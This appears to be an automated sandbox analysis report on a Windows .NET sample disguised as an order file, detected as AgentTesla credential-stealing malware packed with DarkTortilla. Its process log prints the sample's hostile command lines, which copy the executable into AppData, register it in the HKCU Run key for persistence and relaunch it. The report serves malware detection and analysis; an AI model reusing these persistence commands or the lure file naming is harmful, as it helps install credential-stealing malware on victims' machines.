                                                                          Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 18, Received = 18, L

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.034384979181059
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:Orden#46789_2024_Optoflux_mexico_sderls.exe
                                                                          File size:927'744 bytes
                                                                          MD5:9b79cf9008f569169eba09528bf1730c
                                                                          SHA1:7fdcc0ff2d1a8100acbe2e4e0372734bb4396bc1
                                                                          SHA256:ada26de90884fdf8d203297f5f5d2db98c411cebc7a8d36114f0b1ee2b413431
                                                                          SHA512:2233ab1fe358915ad2c7dd3cdc406141cd52ece73e5c05b51cac3530dc9d7b59a7ed729831f66c18200eb9e0a672987749311d641ff5a1b31e84d797fa155af0
                                                                          SSDEEP:24576:nMm5SH6MIl3LkGDhsmD/U0haY/s9fXC7v:nMm5Lnl7kSUXYofXCj
                                                                          TLSH:CD15BE9B73DC2B4CE1BD0BB43532213083B1EF83D961A64879C8EDED267664C69513DA
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.I.........."...P..N..........nm... ........@.. ....................................`................................

                                                                          File Icon

                                                                          Icon Hash:24ed8d96b2ade832

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x4d6d6e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x49B74A07 [Wed Mar 11 05:20:07 2009 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd6d180x53.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd80000xd5f0.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xe28000x0.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xe60000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000xd4d740xd4e004502ba11d63302ef96b4fb96ae97beacFalse0.744918205005872data7.074848234336099IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0xd80000xd5f00xd600dc3c9157af4168a1f1ac4b6c495253d6False0.08602876752336448data3.69834388867502IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0xe60000xc0x20077d1cc40df76bd0eb1bd99eaf7a9d33cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0xd80e80xd228Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/m0.07864312267657993
                                                                          RT_GROUP_ICON0xe53100x14data1.15
                                                                          RT_VERSION0xe53240x2ccdata0.49441340782122906

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          No network behavior found

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:02:54:58
                                                                          Start date:27/06/2024
                                                                          Path:C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe"
                                                                          Imagebase:0x9a0000
                                                                          File size:927'744 bytes
                                                                          MD5 hash:9B79CF9008F569169EBA09528BF1730C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2980414937.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2980414937.0000000002983000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2980414937.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2979580611.0000000000B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:02:56:12
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe"
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:9
                                                                          Start time:02:56:12
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:10
                                                                          Start time:02:56:12
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:ping 127.0.0.1 -n 16
                                                                          Imagebase:0xfe0000
                                                                          File size:18'944 bytes
                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:02:56:22
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"cmd" /c ping 127.0.0.1 -n 18 > nul && copy "C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe" "C:\Users\user\AppData\Roaming\vexplorerez.exe" && ping 127.0.0.1 -n 18 > nul && "C:\Users\user\AppData\Roaming\vexplorerez.exe"
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:02:56:22
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:13
                                                                          Start time:02:56:22
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:ping 127.0.0.1 -n 18
                                                                          Imagebase:0xfe0000
                                                                          File size:18'944 bytes
                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:02:56:27
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe"
                                                                          Imagebase:0x8e0000
                                                                          File size:59'392 bytes
                                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:15
                                                                          Start time:02:56:40
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:ping 127.0.0.1 -n 18
                                                                          Imagebase:0xfe0000
                                                                          File size:18'944 bytes
                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:16
                                                                          Start time:02:56:46
                                                                          Start date:27/06/2024
                                                                          Path:C:\Users\user\AppData\Roaming\vexplorerez.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\vexplorerez.exe"
                                                                          Imagebase:0xee0000
                                                                          File size:927'744 bytes
                                                                          MD5 hash:9B79CF9008F569169EBA09528BF1730C
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000010.00000002.3865481800.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000010.00000002.3865481800.0000000004534000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3865481800.0000000004371000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3865481800.0000000004371000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 68%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:02:56:57
                                                                          Start date:27/06/2024
                                                                          Path:C:\Users\user\AppData\Roaming\vexplorerez.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\vexplorerez.exe"
                                                                          Imagebase:0xee0000
                                                                          File size:927'744 bytes
                                                                          MD5 hash:9B79CF9008F569169EBA09528BF1730C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.4064362259.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.4064362259.0000000003C04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:18
                                                                          Start time:02:57:02
                                                                          Start date:27/06/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\PABILOS MOTORES #5 Y 6.pdf"
                                                                          Imagebase:0x7ff651090000
                                                                          File size:5'641'176 bytes
                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:19
                                                                          Start time:02:57:03
                                                                          Start date:27/06/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                          Imagebase:0x7ff70df30000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:20
                                                                          Start time:02:57:04
                                                                          Start date:27/06/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1640,i,4044299627815770156,1797712374859853902,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                          Imagebase:0x7ff70df30000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:21
                                                                          Start time:02:57:07
                                                                          Start date:27/06/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://verificacfdi.facturaelectronica.sat.gob.mx/?id=39CA617E-9953-41BD-9564-C41A1E1C5584&re=OOMM710314363&rr=PCM910225B86&tt=6090.00&fe=aUIAsQ==
                                                                          Imagebase:0x7ff684c40000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:22
                                                                          Start time:02:57:08
                                                                          Start date:27/06/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2220,i,10829338155938960035,13974893323488573616,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff684c40000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:24
                                                                          Start time:02:57:12
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                          Imagebase:0x3f0000
                                                                          File size:42'064 bytes
                                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3511312688.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3511312688.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:26
                                                                          Start time:02:57:15
                                                                          Start date:27/06/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                          Imagebase:0x540000
                                                                          File size:42'064 bytes
                                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.4607747615.0000000002951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.4607747615.0000000002951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.4607747615.000000000297E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
